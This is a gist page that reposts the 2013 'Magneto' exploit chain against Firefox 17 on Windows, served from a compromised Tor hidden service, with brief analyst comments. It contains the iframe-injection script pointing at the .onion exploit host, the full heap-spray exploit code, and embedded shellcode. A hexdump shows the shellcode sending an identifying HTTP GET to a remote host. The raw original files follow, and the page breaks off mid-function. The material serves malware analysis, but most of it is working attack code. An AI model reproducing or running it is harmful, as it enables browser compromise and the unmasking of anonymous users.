Skip to content

Instantly share code, notes, and snippets.

/magneto.js Secret

Created August 6, 2013 19:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save anonymous/eef4d3a47635191acb8a to your computer and use it in GitHub Desktop.
Save anonymous/eef4d3a47635191acb8a to your computer and use it in GitHub Desktop.
Download ZIP
Raw
magneto.js
/* Via
* http://www.cryptocloud.org/viewtopic.php?f=14&t=2951&p=3866#p3863
* and
* http://pastebin.mozilla.org/2777139
*/
/****************************************************************************
* Exploits delivered from through nl7qbezu7pqsuone.onion (2013-08-03):
*
* The compromised server inserts a run-of-the-mill unobfuscated iframe
* injection script; others have observed this and samples have been posted.
*
* The exploit is split across three files and presumably an ultimate
* payload of malware that was not obtained.
*/
// To preserve the JavaScript syntax highlighting, non-JS bits are commented out.
/****************************************************************************
* A somewhat cleaned up version is presented first, the original exploit
* as first downloaded follows.
*
* This appears to be an exploit in the Firefox 17 JS runtime. The script
* does not attempt the exploit unless running on Firefox 17 on Windows.
*/
/****************************************************************************
* A compromised server inserts a script like the following.
* The XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX is a UUID generated by the server.
* The exploit host will serve the exploit for any UUID, however.
* I used 05cea4de-951d-4037-bf8f-f69055b279bb for this analysis.
* The UUID is embedded in the shellcode.
*/
//<script type='text/javascript'>
function createCookie(name,value,minutes) {
if (minutes) {
var date = new Date();
date.setTime(date.getTime()+(minutes*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}
function isFF() {
return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
function updatify() {
var iframe = document.createElement('iframe');
iframe.style.display = "inline";
iframe.frameBorder = "0";
iframe.scrolling = "no";
iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX";
iframe.height = "5";
iframe.width = "*";
document.body.appendChild(iframe);
}
function format_quick() {
if ( ! readCookie("n_serv") ) {
createCookie("n_serv", "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", 30);
updatify();
}
}
function isReady()
{
if ( document.readyState === "interactive" || document.readyState === "complete" ) {
if ( isFF() ) {
format_quick();
}
}
else
{
setTimeout(isReady, 250);
}
}
setTimeout(isReady, 250);
//</script>
/****************************************************************************
* The exploit server at nl7qbezu7pqsuone.onion also delivers two supporting
* pieces that are loaded into their own iframes. Since they are short,
* they are included before the main exploit.
*
* (All lines containing HTML are commented out.)
*/
//// "content_2.html"
// <html><body></body></html>
// <script>
var y="?????", url=window.location.href;
if(0>url.indexOf(y)) {
var iframe=document.createElement("iframe");
iframe.src="content_3.html";
document.body.appendChild(iframe)
} else parent.w();
function df(){return parent.df()};
// </script>
//// "content_3.html"
// <script>
var y="?????",z="<body><img height='1' width='1' src='error.html' onerror=\"javascript: window.location.href='content_2.html?????';\" ></body>",flag=!1,var83=0;
function b() {
for(var e=Array(1024),d=Array(1024),c=0;1024>c;c++)
e[c]=new ArrayBuffer(180);
for(c=0;1024>c;c++)
d[c]=new Int32Array(e[c],0,45),d[c][9]=var83;
return d
}
function a() {
!1==flag && (flag=!0,window.stop());
window.stop();
b();
window.parent.frames[0].frameElement.ownerDocument.write(z);
b()
}
var83 = parent.df();
0!=var83 && document.addEventListener("readystatechange",a,!1);
// </script>
//// The main exploit
// <html>
// <body>
// <iframe frameborder=0 border=0 height=1 width=1 id="iframe"> </iframe>
// </body>
// </html>
// <script>
var var1=0xB0;
var var2 = new Array(var1);
var var3 = new Array(var1);
var var4 = new Array(var1);
var var5=0xFF004;
var var6=0x3FC01;
var var7=0x60000000;
var var8=0x18000000;
var var9=1;
var var10 = 0x12000000;
var var11 = 0;
var var12=0; // set in b() if on Firefox 17, read in df()
// exploit will not be attempted unless var12 is set
var var13 =0;
// top entry point, called as onload handler
function u()
{
if( t() == true )
{
var9 = 1;
b();
d();
c();
}else{
return ;
}
}
function t() // only attempt the exploit once per session
{
if(typeof sessionStorage.tempStor !="undefined")
return false;
sessionStorage.tempStor="";
return true;
}
function b()
{
var version = al(); // ensure Firefox on Windows
if(version <17)
{
window.location.href="content_1.html";
} // "content_1.html" was never obtained
if( version >=17 && version <18 )
var12 = 0xE8;
return ;
}
function aj(version) // confirm Windows platform
{
var i = navigator.userAgent.indexOf("Windows NT");
if (i != -1)
return true;
return false;
}
function ak() // confirm Firefox browser
{
var ua = navigator.userAgent;
var browser = ua.substring(0, ua.lastIndexOf("/"));
browser = browser.substring(browser.lastIndexOf(" ") + 1);
if (browser != "Firefox")
return -1;
var version = ua.substring(ua.lastIndexOf("/") + 1);
version = parseInt(version.substring(0, version.lastIndexOf(".")));
return version;
}
function al() // get browser version, -1 if not exploitable
{
version = ak();
if (!aj(version))
return -1;
return version;
}
function d()
{
for(var j=0;j<var1;j++)
{
if( j<var1/8 || j==var1-1)
{
var tabb = new Array(0x1ED00);
var4[j]=tabb;
for(i=0;i<0x1ED00;i++)
{
var4[j][i]=0x11559944;
}
}
var2[j]= new ArrayBuffer(var5);
}
for(var j=0;j<var1;j++)
{
var3[j]= new Int32Array(var2[j],0,var6);
var3[j][0]=0x11336688;
for(var i=1;i<16;i++)
{
var3[j][0x4000*i] = 0x11446688;
}
}
for(var j=0;j<var1;j++)
{
if(typeof var4[j] !="undefined")
{
var4[j][0]=0x22556611;
}
}
}
// load the next piece of the exploit
function c()
{
var iframe=document.getElementById("iframe");
iframe.src="content_2.html";
}
// functions below here are called from the other iframes
// df() is passed through content_2 and used by content_3
// called nowhere else
// The exploit is not attempted if this returns zero.
// Note that var12 will be zero unless on Firefox 17.
// The returned value is used as part of a heap spray in content_3.
function df()
{
if(var12==0)
{
return 0x00000000;
}
var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
if( var9 == 1 || var9 == 2)
return ( var14 - var12);
else
return 0x00000000;
}
// w() is called from the second time content_2 is loaded
function w()
{
if(var9==1)
v();
else
x();
}
function v()
{
if(k() == -1)
{
var11 = p();
var9 = 2;
c();
}else{
x();
}
}
// This quickly becomes a huge mess that is obviously depending
// on the JS runtime to screw up in some arcane way. Little is
// known about the actual exploit, other than some apparent
// shellcode in function f(). Here be dragons.
function k()
{
for(var j=0;j<var1;j++)
{
if(var2[j].byteLength!=var5)
{
return j;
}
}
return -1;
}
function p()
{
for(var j=0;j<var1;j++)
{
for(var i=1;i<16;i++)
{
if(var3[j][i*0x4000-0x02]==0x01000000)
{
return -i;
}
}
}
return 0;
}
function x()
{
var var60 = k();
if(var60==-1)
return ;
var nextvar60 = q(var60);
if(nextvar60==-1)
return ;
var var61 = o(var60);
var var62 = new Int32Array(var2[nextvar60],0,var8);
var var58 = n(var62,var61);
if(var58==-1)
return ;
var var50 = m(var62,var58);
var13 = var10 + 0x00100000 + 0x00010000 * var11;
e(var62);
l(var62,var58);
var var64 = var4[var50][0];
ac(var64,var50,var62,var58,var60);
}
function q(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
view[0x00100000/4-0x02]=var7;
if(var2[var60+1].byteLength==var7)
return var60+1;
return -1;
}
function o(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
var var59 = view[0x00100000/4-0x0C];
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
return ((var59 - var57)/4);
}
function n(view,firstvar58)
{
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
var var58=0;
for(var i=0;i<200;i++)
{
if(view[var58] != 0x11336688)
{
if(view[var58] == 0x22556611 )
return var58;
else
return -1;
}
if(var58==0)
{
var58 = firstvar58;
}else{
var var59=view[var58-0x0C];
var58 = (var59 - var57)/4;
}
}
return -1;
}
function m(view,var58)
{
view[var58]=0x00000000;
for(var j=0;j<var1;j++)
{
if(typeof var4[j] !="undefined")
{
if(var4[j][0]!=0x22556611)
return j;
}
}
return -1
}
function e(view)
{
var i=0;
for(i=0;i<0x400;i++)
{
view[i] = var13+0x1010 ;
}
view[0x0]=var13+0x1010;
view[0x44]=0x0;
view[0x45]=0x0;
view[0x400-4]=var13+0x1010;
view[0x400]=0x00004004;
view[0x401]=0x7FFE0300;
}
function l(view,var58)
{
view[var58] = var13 + 0x1030;
view[var58+1] = 0xFFFFFF85;
}
function ac(var64,var50,var62,var58,var60)
{
var var15=ah(var64);
f(var15,var62,var58);
y(var50);
var var66 = aa(var62,var58+2);
var var67 = i(var66,0x40,var50,var62) ;
j(var67,var62);
g(var50,var62);
ab(var13+0x1040 ,var62,var58+2);
r(var60)
setTimeout(ad,1000);
z(var50);
}
function ah(var73)
{
var var74 = var73.substring(0,2);
var var70 = var74.charCodeAt(0);
var var71 = var74.charCodeAt(1);
var var75 = (var71 << 16) + var70;
if (var75 == 0)
{
var var76 = var73.substring(32, 34);
var var70 = var76.charCodeAt(0);
var var71 = var76.charCodeAt(1);
var75 = (var71 << 16) + var70;
}
var var15 = am(var75);
if (var15 == -1)
{
return;
}
return var15
}
function am(var77)
{
var var15 = new Array(2);
if (var77 % 0x10000 == 0xE510)
{
var78 = var77 - 0xE510;
var15[0] = var78 + 0xE8AE;
var15[1] = var78 + 0xD6EE;
}
else if (var77 % 0x10000 == 0x9A90)
{
var78 = var77 - 0x69A90;
var15[0] = var78 + 0x6A063;
var15[1] = var78 + 0x68968;
}
else if (var77 % 0x10000 == 0x5E70)
{
var78 = var77 - 0x65E70;
var15[0] = var78 + 0x66413;
var15[1] = var78 + 0x64D34;
}
else if (var77 % 0x10000 == 0x35F3)
{
var78 = var77 - 0x335F3;
var15[0] = var78 + 0x4DE13;
var15[1] = var78 + 0x49AB8;
}
else if (var77 % 0x10000 == 0x5CA0)
{
var78 = var77 - 0x65CA0;
var15[0] = var78 + 0x66253;
var15[1] = var78 + 0x64B84;
}
else if (var77 % 0x10000 == 0x5CD0)
{
var78 = var77 - 0x65CD0;
var15[0] = var78 + 0x662A3;
var15[1] = var78 + 0x64BA4;
}
else if (var77 % 0x10000 == 0x6190)
{
var78 = var77 - 0x46190;
var15[0] = var78 + 0x467D3;
var15[1] = var78 + 0x45000;
}
else if (var77 % 0x10000 == 0x9CB9)
{
var78 = var77 - 0x29CB9;
var15[0] = var78 + 0x29B83;
var15[1] = var78 + 0xFFC8;
}
else if (var77 % 0x10000 == 0x9CE9)
{
var78 = var77 - 0x29CE9;
var15[0] = var78 + 0x29BB3;
var15[1] = var78 + 0xFFD8;
}
else if (var77 % 0x10000 == 0x70B0)
{
var78 = var77 - 0x470B0;
var15[0] = var78 + 0x47733;
var15[1] = var78 + 0x45F18;
}
else if (var77 % 0x10000 == 0x7090)
{
var78 = var77 - 0x47090;
var15[0] = var78 + 0x476B3;
var15[1] = var78 + 0x45F18;
}
else if (var77 % 0x10000 == 0x9E49)
{
var78 = var77 - 0x29E49;
var15[0] = var78 + 0x29D13;
var15[1] = var78 + 0x10028;
}
else if (var77 % 0x10000 == 0x9E69)
{
var78 = var77 - 0x29E69;
var15[0] = var78 + 0x29D33;
var15[1] = var78 + 0x10018;
}
else if (var77 % 0x10000 == 0x9EB9)
{
var78 = var77 - 0x29EB9;
var15[0] = var78 + 0x29D83;
var15[1] = var78 + 0xFFC8;
}
else
{
return -1;
}
return var15;
}
function f(var15,view,var16)
{
var magneto = "";
var magneto = ("\ufc60\u8ae8"+"\u0000\u6000"+"\ue589\ud231"+"\u8b64\u3052"+"\u528b\u8b0c"+"\u1452\u728b"+"\u0f28\u4ab7"+"\u3126\u31ff"+"\uacc0\u613c"+"\u027c\u202c"+"\ucfc1\u010d"+"\ue2c7\u52f0"+"\u8b57\u1052"+"\u428b\u013c"+"\u8bd0\u7840"+"\uc085\u4a74"+"\ud001\u8b50"+"\u1848\u588b"+"\u0120\ue3d3"+"\u493c\u348b"+"\u018b\u31d6"+"\u31ff\uacc0"+"\ucfc1\u010d"+"\u38c7\u75e0"+"\u03f4\uf87d"+"\u7d3b\u7524"+"\u58e2\u588b"+"\u0124\u66d3"+"\u0c8b\u8b4b"+"\u1c58\ud301"+"\u048b\u018b"+"\u89d0\u2444"+"\u5b24\u615b"+"\u5a59\uff51"+"\u58e0\u5a5f"+"\u128b\u86eb"+"\u5d05\ubd81"+"\u02e9\u0000"+"\u4547\u2054"+"\u7075\u858d"+"\u02d1\u0000"+"\u6850\u774c"+"\u0726\ud5ff"+"\uc085\u5e74"+"\u858d\u02d8"+"\u0000\u6850"+"\u774c\u0726"+"\ud5ff\uc085"+"\u4c74\u90bb"+"\u0001\u2900"+"\u54dc\u6853"+"\u8029\u006b"+"\ud5ff\udc01"+"\uc085\u3675"+"\u5050\u5050"+"\u5040\u5040"+"\uea68\udf0f"+"\uffe0\u31d5"+"\uf7db\u39d3"+"\u74c3\u891f"+"\u6ac3\u8d10"+"\ue1b5\u0002"+"\u5600\u6853"+"\ua599\u6174"+"\ud5ff\uc085"+"\u1f74\u8dfe"+"\u0089\u0000"+"\ue375\ubd80"+"\u024f\u0000"+"\u7401\ue807"+"\u013b\u0000"+"\u05eb\u4de8"+"\u0001\uff00"+"\ub8e7\u0100"+"\u0000\uc429"+"\ue289\u5052"+"\u6852\u49b6"+"\u01de\ud5ff"+"\u815f\u00c4"+"\u0001\u8500"+"\u0fc0\uf285"+"\u0000\u5700"+"\uf9e8\u0000"+"\u5e00\uca89"+"\ubd8d\u02e9"+"\u0000\uebe8"+"\u0000\u4f00"+"\ufa83\u7c20"+"\uba05\u0020"+"\u0000\ud189"+"\uf356\ub9a4"+"\u000d\u0000"+"\ub58d\u02c4"+"\u0000\ua4f3"+"\ubd89\u024b"+"\u0000\u565e"+"\ua968\u3428"+"\uff80\u85d5"+"\u0fc0\uaa84"+"\u0000\u6600"+"\u488b\u660a"+"\uf983\u0f04"+"\u9c82\u0000"+"\u8d00\u0c40"+"\u008b\u088b"+"\u098b\u00b8"+"\u0001\u5000"+"\ue789\uc429"+"\ue689\u5657"+"\u5151\u4868"+"\ud272\uffb8"+"\u85d5\u81c0"+"\u04c4\u0001"+"\u0f00\u0fb7"+"\uf983\u7206"+"\ub96c\u0006"+"\u0000\u10b8"+"\u0000\u2900"+"\u89c4\u89e7"+"\ud1ca\u50e2"+"\u3152\u8ad2"+"\u8816\u24d0"+"\uc0f0\u04e8"+"\u093c\u0477"+"\u3004\u02eb"+"\u3704\u0788"+"\u8847\u24d0"+"\u3c0f\u7709"+"\u0404\ueb30"+"\u0402\u8837"+"\u4707\ue246"+"\u59d4\ucf29"+"\ufe89\u0158"+"\u8bc4\u4bbd"+"\u0002\uf300"+"\uc6a4\u4f85"+"\u0002\u0100"+"\u2ee8\u0000"+"\u3100\u50c0"+"\u2951\u4fcf"+"\u5357\uc268"+"\u38eb\uff5f"+"\u53d5\u7568"+"\u4d6e\uff61"+"\ue9d5\ufec8"+"\uffff\uc931"+"\ud1f7\uc031"+"\uaef2\ud1f7"+"\uc349\u0000"+"\u0000\u8d00"+"\ue9bd\u0002"+"\ue800\uffe4"+"\uffff\ub94f"+"\u004f\u0000"+"\ub58d\u0275"+"\u0000\ua4f3"+"\ubd8d\u02e9"+"\u0000\ucbe8"+"\uffff\uc3ff"+"\u0a0d\u6f43"+"\u6e6e\u6365"+"\u6974\u6e6f"+"\u203a\u656b"+"\u7065\u612d"+"\u696c\u6576"+"\u0a0d\u6341"+"\u6563\u7470"+"\u203a\u2f2a"+"\u0d2a\u410a"+"\u6363\u7065"+"\u2d74\u6e45"+"\u6f63\u6964"+"\u676e\u203a"+"\u7a67\u7069"+"\u0a0d\u0a0d"+"\u8300\u0ec7"+"\uc931\ud1f7"+"\uc031\uaef3"+"\uff4f\u0de7"+"\u430a\u6f6f"+"\u696b\u3a65"+"\u4920\u3d44"+"\u7377\u5f32"+"\u3233\u4900"+"\u4850\u504c"+"\u5041\u0049"+"\u0002\u5000"+"\ude41\u36ca"+"\u4547\u2054"+"\u302f\u6335"+"\u6165\u6434"+"\u2d65\u3539"+"\u6431\u342d"+"\u3330\u2d37"+"\u6662\u6638"+"\u662d\u3936"+"\u3530\u6235"+"\u3732\u6239"+"\u2062\u5448"+"\u5054\u312f"+"\u312e\u0a0d"+"\u6f48\u7473"+"\u203a\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u9000"+"");
var var29 = magneto;
var var17 = "\u9060";
var var18 = "\u9061";
var var19 = "\uC481\u0000\u0008" ;
var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var22 = "\uE589";
var var23 ="\uC3C9";
var var24 = "\uE889";
var24 += "\u608D\u90C0";
var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
var var26 = var25 + var16*4
var var27 =""
var27 += "\uB890\u2020\u2020";
var27 += "\uA390"+ae(var26+0x00);
var27 += "\uA390"+ae(var26+0x04);
var27 += "\uA390"+ae(var26+0x08);
var27 += "\uA390"+ae(var26+0x0C);
var var28 = var17;
var28 += var20;
var28 += var19;
var28 += var22;
var28 += var27;
var28 += var29;
var28 += var21;
var28 += var18;
var28 += var23;
var var29Array = new Array();
var29Array=ag(var28);
var var29Ad = var13+0x5010;
var i=0;
var j=0;
var var30=var13+0x4048;
var var31 = new Array();
var31[0]=var30;
var31[1]=var30;
var31[2]=var30;
var31[3]=var15[1];
var31[4]=var29Ad;
var31[5]=0xFFFFFFFF;
var31[6]=var13+0x4044;
var31[7]=var13+0x4040;
var31[8]=0x00000040;
var31[9]=var13+0x4048;
var31[10]=0x00040000;
var31[11]=var29Ad;
var31[12]=var13+0x301C;
for(var i=0 ; i < 0x140 ; i++)
{
var31[i+15]=var15[0];
}
var var32 = 0x3F8;
view[0x800+0+var32]=var13+0x4018;
view[0x800+1+var32]=var13+0x4018;
for(var i=2 ; i < var31.length ; i++)
{
view[0x800+i+var32]= 0x41414141;
}
for(var i=0 ; i < var31.length ; i++)
{
view[0xC02+i+var32]= var31[i];
}
for(var i=0 ; i < var29Array.length ; i++)
{
view[0x1000 + i+var32] = var29Array[i];
}
}
function ae(int32)
{
var var68 = String.fromCharCode((int32)& 0x0000FFFF);
var var69 = String.fromCharCode((int32 >> 16) & 0x0000FFFF);
return var68+var69;
}
function af(string)
{
var var70 = string.charCodeAt(0);
var var71 = string.charCodeAt(1);
var var72 = (var71 << 16) + var70;
return var72;
}
function ag(string)
{
if(string.length%2!=0)
string+="\u9090";
var intArray= new Array();
for(var i=0 ; i*2 < string.length; i++ )
intArray[i]=af(string[i*2]+string[i*2+1]);
return intArray;
}
function y(index)
{
var4[index][1]= document.createElement('span') ;
}
function aa(view,var63)
{
return view[var63];
}
function i(address,size,var50,view)
{
var var56 = size/2;
var56 = var56*0x10 +0x04;
view[0x400]=var56;
view[0x401]=address;
return var4[var50][0];
}
function j(memory,view)
{
var intArray=ag(memory);
for(var i=0 ; i < intArray.length ; i++)
{
view[0x404+i]=intArray[i];
}
}
function g(var50,view)
{
var k = h(var50,view);
var j=0;
if( k < 0 )
return -1;
view[0x404+k]=var13+0x3010;
return 1;
}
function h(var50,view)
{
var address=0;
var u=0;
var memory="";
var var55=0;
for( u =7; u >=4 ;u--)
{
address=view[0x404+u];
if( address > 0x000A0000 && address < 0x80000000 )
{
memory = i(address,0x48,var50,view);
var55=af(memory[0x14]+memory[0x15]);
if(var55==address)
{
return u;
}
}
}
return -1;
}
function ab(address,view,var63)
{
view[var63]=address;
}
function r(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
view[0x00100000/4-0x02]=var5;
}
function z(index,index2)
{
var4[index][1].innerHTML;
}
// ad() is called through setTimeout
function ad()
{
for(var j=0;j<var1;j++)
{
delete var3[j]
var3[j]= null;
delete var2[j];
var2[j] = null;
if(typeof var4[j] !="undefined")
{
delete var4[j];
var4[j] = null;
}
}
delete var2;
delete var3;
delete var4;
var2=null;
var3=null;
var4=null;
}
window.addEventListener("onload", u(),true);
// </script>
/****************************************************************************
* This a hexdump of the shellcode block as "var magneto" in f() above.
*/
// 0000 60 fc e8 8a 00 00 00 60 89 e5 31 d2 64 8b 52 30 |`......`..1.d.R0|
// 0010 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 |.R..R..r(..J&1.1|
// 0020 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 |..<a|., .......R|
// 0030 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a |W.R..B<...@x..tJ|
// 0040 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 |..P.H..X ...<I.4|
// 0050 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 |...1.1.......8.u|
// 0060 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 |..}.;}$u.X.X$..f|
// 0070 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 |..K.X.........D$|
// 0080 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 |$[[aYZQ..X_Z....|
// 0090 05 5d 81 bd e9 02 00 00 47 45 54 20 75 70 8d 85 |.]......GET up..|
// 00a0 d1 02 00 00 50 68 4c 77 26 07 ff d5 85 c0 74 5e |....PhLw&.....t^|
// 00b0 8d 85 d8 02 00 00 50 68 4c 77 26 07 ff d5 85 c0 |......PhLw&.....|
// 00c0 74 4c bb 90 01 00 00 29 dc 54 53 68 29 80 6b 00 |tL.....).TSh).k.|
// 00d0 ff d5 01 dc 85 c0 75 36 50 50 50 50 40 50 40 50 |......u6PPPP@P@P|
// 00e0 68 ea 0f df e0 ff d5 31 db f7 d3 39 c3 74 1f 89 |h......1...9.t..|
// 00f0 c3 6a 10 8d b5 e1 02 00 00 56 53 68 99 a5 74 61 |.j.......VSh..ta|
// 0100 ff d5 85 c0 74 1f fe 8d 89 00 00 00 75 e3 80 bd |....t.......u...|
// 0110 4f 02 00 00 01 74 07 e8 3b 01 00 00 eb 05 e8 4d |O....t..;......M|
// 0120 01 00 00 ff e7 b8 00 01 00 00 29 c4 89 e2 52 50 |..........)...RP|
// 0130 52 68 b6 49 de 01 ff d5 5f 81 c4 00 01 00 00 85 |Rh.I...._.......|
// 0140 c0 0f 85 f2 00 00 00 57 e8 f9 00 00 00 5e 89 ca |.......W.....^..|
// 0150 8d bd e9 02 00 00 e8 eb 00 00 00 4f 83 fa 20 7c |...........O.. ||
// 0160 05 ba 20 00 00 00 89 d1 56 f3 a4 b9 0d 00 00 00 |.. .....V.......|
// 0170 8d b5 c4 02 00 00 f3 a4 89 bd 4b 02 00 00 5e 56 |..........K...^V|
// 0180 68 a9 28 34 80 ff d5 85 c0 0f 84 aa 00 00 00 66 |h.(4...........f|
// 0190 8b 48 0a 66 83 f9 04 0f 82 9c 00 00 00 8d 40 0c |.H.f..........@.|
// 01a0 8b 00 8b 08 8b 09 b8 00 01 00 00 50 89 e7 29 c4 |...........P..).|
// 01b0 89 e6 57 56 51 51 68 48 72 d2 b8 ff d5 85 c0 81 |..WVQQhHr.......|
// 01c0 c4 04 01 00 00 0f b7 0f 83 f9 06 72 6c b9 06 00 |...........rl...|
// 01d0 00 00 b8 10 00 00 00 29 c4 89 e7 89 ca d1 e2 50 |.......).......P|
// 01e0 52 31 d2 8a 16 88 d0 24 f0 c0 e8 04 3c 09 77 04 |R1.....$....<.w.|
// 01f0 04 30 eb 02 04 37 88 07 47 88 d0 24 0f 3c 09 77 |.0...7..G..$.<.w|
// 0200 04 04 30 eb 02 04 37 88 07 47 46 e2 d4 59 29 cf |..0...7..GF..Y).|
// 0210 89 fe 58 01 c4 8b bd 4b 02 00 00 f3 a4 c6 85 4f |..X....K.......O|
// 0220 02 00 00 01 e8 2e 00 00 00 31 c0 50 51 29 cf 4f |.........1.PQ).O|
// 0230 57 53 68 c2 eb 38 5f ff d5 53 68 75 6e 4d 61 ff |WSh..8_..ShunMa.|
// 0240 d5 e9 c8 fe ff ff 31 c9 f7 d1 31 c0 f2 ae f7 d1 |......1...1.....|
// 0250 49 c3 00 00 00 00 00 8d bd e9 02 00 00 e8 e4 ff |I...............|
// 0260 ff ff 4f b9 4f 00 00 00 8d b5 75 02 00 00 f3 a4 |..O.O.....u.....|
// 0270 8d bd e9 02 00 00 e8 cb ff ff ff c3 0d 0a 43 6f |..............Co|
// 0280 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 |nnection: keep-a|
// 0290 6c 69 76 65 0d 0a 41 63 63 65 70 74 3a 20 2a 2f |live..Accept: */|
// 02a0 2a 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 |*..Accept-Encodi|
// 02b0 6e 67 3a 20 67 7a 69 70 0d 0a 0d 0a 00 83 c7 0e |ng: gzip........|
// 02c0 31 c9 f7 d1 31 c0 f3 ae 4f ff e7 0d 0a 43 6f 6f |1...1...O....Coo|
// 02d0 6b 69 65 3a 20 49 44 3d 77 73 32 5f 33 32 00 49 |kie: ID=ws2_32.I|
// 02e0 50 48 4c 50 41 50 49 00 02 00 00 50 41 de ca 36 |PHLPAPI....PA..6|
// 02f0 47 45 54 20 2f 30 35 63 65 61 34 64 65 2d 39 35 |GET /05cea4de-95|
// 0300 31 64 2d 34 30 33 37 2d 62 66 38 66 2d 66 36 39 |1d-4037-bf8f-f69|
// 0310 30 35 35 62 32 37 39 62 62 20 48 54 54 50 2f 31 |055b279bb HTTP/1|
// 0320 2e 31 0d 0a 48 6f 73 74 3a 20 00 00 00 00 00 00 |.1..Host: ......|
// 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
// *
// 03b0 00 00 00 00 00 00 00 00 00 00 00 90 |............|
// 03bc
/****************************************************************************
* The original files as obtained from the exploit server follow:
*/
//// "content_2.html"
<html><body></body></html><script>var y="?????",url=window.location.href;if(0>url.indexOf(y)){var iframe=document.createElement("iframe");iframe.src="content_3.html";document.body.appendChild(iframe)}else parent.w();function df(){return parent.df()};</script>
//// "content_3.html"
<script>var y="?????",z="",z=z+"<body",z=z+">",z=z+"<img",z=z+" height='1' width='1' src='error.html'",z=z+' onerror="javascript: ',z=z+("window.location.href='content_2.html"+y+"';\" "),z=z+">",z=z+"</body",z=z+">",flag=!1,var83=0;
function b(){for(var e=Array(1024),d=Array(1024),c=0;1024>c;c++)e[c]=new ArrayBuffer(180);for(c=0;1024>c;c++)d[c]=new Int32Array(e[c],0,45),d[c][9]=var83;return d}function a(){!1==flag&&(flag=!0,window.stop());window.stop();b();window.parent.frames[0].frameElement.ownerDocument.write(z);b()}var83=parent.df();0!=var83&&document.addEventListener("readystatechange",a,!1);
</script>
//// main exploit
<html>
<body>
<iframe frameborder=0 border=0 height=1 width=1 id="iframe"> </iframe>
</body>
</html>
<script>
var var1=0xB0;
var var2 = new Array(var1);
var var3 = new Array(var1);
var var4 = new Array(var1);
var var5=0xFF004;
var var6=0x3FC01;
var var7=0x60000000;
var var8=0x18000000;
var var9=1;
var var10 = 0x12000000;
var var11 = 0;
var var12=0;
var var13 =0;
function df()
{
if(var12==0)
{
return 0x00000000;
}
var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
if( var9 == 1 || var9 == 2)
return ( var14 - var12);
else
return 0x00000000;
}
function b()
{
var version = al();
if(version <17)
{
window.location.href="content_1.html";
}
if( version >=17 && version <18 )
var12 = 0xE8;
return ;
}
function c()
{
var iframe=document.getElementById("iframe");
iframe.src="content_2.html";
}
function d()
{
for(var j=0;j<var1;j++)
{
if( j<var1/8 || j==var1-1)
{
var tabb = new Array(0x1ED00);
var4[j]=tabb;
for(i=0;i<0x1ED00;i++)
{
var4[j][i]=0x11559944;
}
}
var2[j]= new ArrayBuffer(var5);
}
for(var j=0;j<var1;j++)
{
var3[j]= new Int32Array(var2[j],0,var6);
var3[j][0]=0x11336688;
for(var i=1;i<16;i++)
{
var3[j][0x4000*i] = 0x11446688;
}
}
for(var j=0;j<var1;j++)
{
if(typeof var4[j] !="undefined")
{
var4[j][0]=0x22556611;
}
}
}
function e(view)
{
var i=0;
for(i=0;i<0x400;i++)
{
view[i] = var13+0x1010 ;
}
view[0x0]=var13+0x1010;
view[0x44]=0x0;
view[0x45]=0x0;
view[0x400-4]=var13+0x1010;
view[0x400]=0x00004004;
view[0x401]=0x7FFE0300;
}
function f(var15,view,var16)
{
var magneto = "";
